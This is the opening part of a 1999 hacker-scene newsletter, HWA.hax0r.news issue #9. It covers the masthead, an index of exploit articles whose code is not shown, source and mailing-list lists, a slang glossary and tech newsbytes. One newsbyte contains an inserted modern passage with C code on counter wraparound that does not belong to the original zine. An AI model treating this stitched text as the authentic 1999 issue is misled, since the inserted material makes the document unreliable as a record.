hwa-hn09
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 9 Volume 1 1999 March 13th 99
==========================================================================
Are you running WindowsNT and still under the illusion that it is secure?
``A couple of freelance writers are working on a story for us about
security auditing and protection. As part of their "research," they
decided to see if they could hack into one of our lab networks. It
took them only a few hours to successfully break into our Windows NT
boxes. And from there, they learned the configuration of our lab
networks, the server names and functions, the operating systems we
run and most of the passwords on the key accounts on our Microsoft
Windows NT, Novell NetWare and Unix servers, as well as a good many
of our routers and switches.''
- From NetworkWeek, Story in section 10.0
Synopsis
--------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see.
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info. It's a labour
of love and will be continued for as long as I feel like it; I'm not
motivated by dollars or the illusion of fame. Did you ever notice how
the most famous/infamous hackers are the ones that get caught? There's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #9
=-----------------------------------------------------------------------=
"I'm doing the BEST I can so don't give me any SHIT"
- Seen on a button worn by `Ed'..
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #9 Empirical knowledge is power
=--------------------------------------------------------------------------=
inet.d THIS b1lly the llammah
________ ------- ___________________________________________________________
|\____\_/[ INDEX ]__________________________________________________________/|
| | ||
| | Key Content ||
\|_________________________________________________________________________/
00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0
\__________________________________________________________________________/
01.0 .. Greets
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the editor
02.1 .. Demoniz trashcans his webboard
03.0 .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse
03.1 .. The FPSC-IRCD.txt advisory.
04.0 .. Pentagon under attack (again)
04.1 .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
04.2 .. New Backdoor found: Default passwords in Bay networks switches
04.3 .. ISAPI exploit code
04.4 .. Winfreez.c new exploit code for win9x and NT
04.5 .. Unknown Zone: Windows intra/inter net zone difficulties
04.6 .. Sniffing out MS Security glitch
05.0 .. Linux TCP flaw exploit code for Linux 2.0.35 and older.
(includes Solaris version)
06.0 .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
07.0 .. New Computer Technology Makes Hacking a Snap - Washington Post
08.0 .. Korean "Superhacker" a national resource...
09.0 .. The l0pht and NFR team up to produce top flight IDS
10.0 .. A good example of how 'Secure' NT really is
11.0 .. CON: The Black Hat Briefings Security Conference
12.0 .. CON: CQRE [Secure] Congress and Exhibition
13.0 .. CON: can't afford $2k? check out Canc0n99 security Conference
14.0 .. CON: Countering cyberterrorism
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
H.W .. Hacked Websites
A.0 .. APPENDICES
A.1 .. PHACVW linx and references
____________________________________________________________________________
|\__________________________________________________________________________/|
| | ||
| | ||
\|_________________________________________________________________________|/
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so I'll print any and all news but will quote
sources when the source is known; if it's good enough for CNN it's good
enough for me. And I'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Has it occurred to anybody that "AOL for Dummies" is an extremely
redundant name for a book?
- unknown
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
*News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
News (New site unconfirmed).......http://cnewz98.hypermart.net/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide; if no response is received within a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and it may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without your
permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
BEST-OF-SECURITY Subscription Info.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_/_/_/ _/_/ _/_/_/
_/ _/ _/ _/ _/
_/_/_/ _/ _/ _/_/
_/ _/ _/ _/ _/
_/_/_/ _/_/ _/_/_/
Best Of Security
"echo subscribe|mail best-of-security-request@suburbia.net"
or
"echo subscribe|mail best-of-security-request-d@suburbia.net"
(weekly digest)
For those of you that just don't get the above, try sending a message to
best-of-security-request@suburbia.net with a subject and body of subscribe
and you will get added to the list (maybe, if the admin likes your email).
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
"If all it takes is a million monkeys banging on keyboards then how
come AOL hasn't turned out any Shakespeare yet??" - Anon.
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondents please check in or be removed by next
issue. I need your current emails since contact info was recently lost in a
HD mishap and I'm not carrying any deadweight. Plus we need more people sending
in info; my apologies for not getting back to you if you sent in January, I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
Contributors to this issue:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spikeman .........................: daily news updates+
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form. Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events it's a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"When i'm 21 i'm going to change my name to 'Anonymous' and
claim royalties for all the editorials written and attributed
to my name." - Anonymous
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, I'd highly recommend you get that book. It's almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the terms related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavy equals" sign means "almost equal" to. If written
as =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but I'd
like to see more reader input, help me out here, what's good, what sucks
etc, not that I guarantee I'll take any notice mind you, but send in
your thoughts anyway.
Shouts to:
* Kevin Mitnick * demoniz * The l0pht crew
* tattooman * Dicentra * Pyra
* Vexxation * FProphet * TwistedP
* NeMstah * the readers * mj
* Kokey * ypwitch * kimmie
* tsal * spikeman * YOU.
* #leetchans ppl, you know who you are...
* all the people who sent in cool emails and support
* our new 'staff' members.
kewl sites:
+ http://www.freshmeat.net/
+ http://www.slashdot.org/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
+ http://www.legions.org/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ BORED?
You may be interested in this...
http://www.patents.ibm.com/details?patent_number=5501650
if that isn't quite your erh speed, then you can always
check out http://www.hamsterdance.com/ for a laugh
I enjoyed it ...the graphics are most amusing.
++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO?
Contributed by FProphet source: Betanews.com
And you thought it was just you. Betanews.com (www.betanews.com)
reports that Microsoft has acknowledged a new bug discovered in
Windows that locks a machine after 49.7 days of consecutive usage.
A fix is available now, and is expected to appear in the forthcoming
Windows 98 service release update, currently expected to be released
in April. Microsoft's Personal Support Center has details.
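The 49.7-day figure above is exactly the wraparound period of a 32-bit millisecond counter (2^32 ms is about 49.71 days); the item does not say that this is the cause, so treat that mechanism as an assumption. The C example below is added here and is not from the zine, Betanews or Microsoft: it shows how a timeout check that compares raw counter values goes wrong at the wrap, and the modular-subtraction form that stays correct, which is the pattern to look for when reviewing any uptime-dependent code.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumption (not stated in the news item): the lockup follows from a
 * 32-bit millisecond uptime counter wrapping back to zero. */
#define MS_PER_DAY   86400000.0
#define TICK_WRAP_MS 4294967296.0   /* 2^32 milliseconds */

/* Days of continuous uptime before a 32-bit ms counter wraps: ~49.71. */
double days_until_wrap(void)
{
    return TICK_WRAP_MS / MS_PER_DAY;
}

/* Naive timeout test: compares the raw counter against a precomputed
 * deadline. Once the deadline has wrapped past zero but the counter has
 * not, every call reports "expired" although almost no time has passed. */
int naive_expired(uint32_t now, uint32_t deadline)
{
    return now >= deadline;
}

/* Wrap-safe timeout test: elapsed time is (now - start) in unsigned
 * 32-bit arithmetic. Unsigned subtraction is modular, so the result is
 * the true elapsed interval across the wrap as long as the interval is
 * shorter than the wrap period. */
int safe_expired(uint32_t now, uint32_t start, uint32_t timeout_ms)
{
    return (uint32_t)(now - start) >= timeout_ms;
}

int main(void)
{
    /* Constructed scenario: a 1000 ms timeout armed 256 ms before the wrap. */
    uint32_t start       = 0xFFFFFF00u;
    uint32_t timeout     = 1000u;
    uint32_t deadline    = start + timeout;   /* wraps to 744 */
    uint32_t before_wrap = 0xFFFFFF80u;       /* 128 ms after start */
    uint32_t after_wrap  = 0x00000300u;       /* 1024 ms after start */

    printf("32-bit ms counter wraps after %.2f days\n", days_until_wrap());
    printf("128 ms elapsed:  naive=%d safe=%d\n",
           naive_expired(before_wrap, deadline),
           safe_expired(before_wrap, start, timeout));
    printf("1024 ms elapsed: naive=%d safe=%d\n",
           naive_expired(after_wrap, deadline),
           safe_expired(after_wrap, start, timeout));
    return 0;
}
```

Compiled with any C99 compiler, the naive check reports the timer expired after only 128 ms because its deadline has already wrapped, while the subtraction form reports it correctly at 1024 ms; the same defect shows up wherever a counter is compared directly against a stored deadline instead of measuring elapsed time.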
++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE
Mar 11th
Contributed by Ed
Intel released a program that allows the user to turn off the serial
number of their new Pentium III chip, but Zero-Knowledge Systems
claims it has developed an exploit which will retrieve the serial
number whether the feature is turned on or off. I don't have one of
these chips to test this out on so can't confirm or deny this report.
++ BANK PLAN FOES LINE UP
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html
Opponents of "Know Your Customer," a controversial plan by
the government to monitor individuals' banking activities,
will make their case on Capitol Hill. By Declan McCullagh.
++ DELL TO BUY BOATLOAD FROM IBM
http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html
Dell will buy about US$16 billion of chips, drives, and
monitors from IBM during the next seven years. It's a nice
boost to both companies.
++ CANADIAN TELECOM BEHEMOTH BORN
http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html
++ AT&T Canada buys regional phone firm Metronet communications
in US$4.6 billion deal.
++ EUROPEAN TELECOMS: BUY, BUY, BUY
http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html
France's Alcatel agrees to buy another California Internet
company for US$350 million. And Germany's Siemens is
expected to spend US$1.7 billion on US
data-networking firms.
++ IT'S A LINUXWORLD AFTER ALL
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html
This week's conference is turning a tightknit community into
an international phenomenon. Not all of the new industry
stars are ready for the spotlight. Polly Sprenger reports
from San Jose, California.
++ LINUX GETS OPEN-SOURCE GUI
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html
Thanks to an interface lift, Linux is ready to star on the
desktop. GNOME marries components from familiar windowing
environments and adds a few things of its own. Leander
Kahney reports from San Jose, California.
++ NIPPING AT THE HEELS OF MP3
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html
When high tech does battle on the Net, it's not always the
best tech that wins. This is the lesson that a smaller,
faster digital music format is learning in the face of MP3.
By Christopher Jones.
++ TURNING DATA INTO DOLLARS
http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html
PeopleSoft stores information on about 30 million employees
worldwide. Now the company is looking to generate e-business
from its data banks, a plan that's raising eyebrows. By
Joanna Glasner.
++ FROM COMDEX TO VENICE
http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html
The creator of one of the world's biggest computer-trade
shows builds the world's most high-tech hotel. Vince Beiser
reports from Las Vegas.
++ NO TIME FOR PAIN
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html
A new therapy using electric current reduces chronic back
pain, according to a study in the Journal of the American
Medical Association. By Kristen Philipkoski.
++ MONICA'S BIO, BYTE BY BYTE
http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html
Monica's Story, the Lewinsky memoir hitting bookstores on
Thursday, will be the first book published simultaneously in
e-book and paper form. By Steve Silberman.
++ BIG INSIDER SALES AT YAHOO
http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html
Executives sold close to a million shares in February.
Analysts say this could be a red flag. By Jennifer Sullivan.
++ SENATE HEARS Y2K LIABILITY ACT
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html
Two senators introduce the latest legislation to head off a
raft of Year 2000 lawsuits arising from failed computer
systems. By Heidi Kriz.
++ BRITS ON NET: JOLLY GOOD
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html
Ten thousand new Britons log on each day, a new poll reveals.
German newbies nip close at their heels, but France
has a ways to go.
++ KING FOR THE DOMAINS IN SIGHT
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html
The Internet Corporation for Assigned Names and Numbers
finalizes proposals that will lay down the law on .com -- as
well as .biz, .xxx, and other future top-level domains. By
Chris Oakes.
++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html
Older investors looking to retire should stay away from
Internet stocks, the Federal Reserve chairman
tells Congress.
++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html
An Ohio State law professor will represent the
administration's views concerning online privacy, an issue
which gains a little more momentum every day. By Declan
McCullagh and James Glave.
++ MUSIC INDUSTRY PLANS DVD AUDIO
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html
Record companies and technology companies agree on a
copy-protection framework for the successor to CDs. DVD
Audio is finally ready for consumers. By Christopher Jones.
++ DELL MORPHS INTO A RETAILER
http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html
The world's biggest direct seller of PCs hopes to become a
big online seller of consumer electronics too. Wednesday, it
launched its own online superstore.
++ LINUX, MEET OPERA
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html
Fans of Linux and Opera, which have both built support by
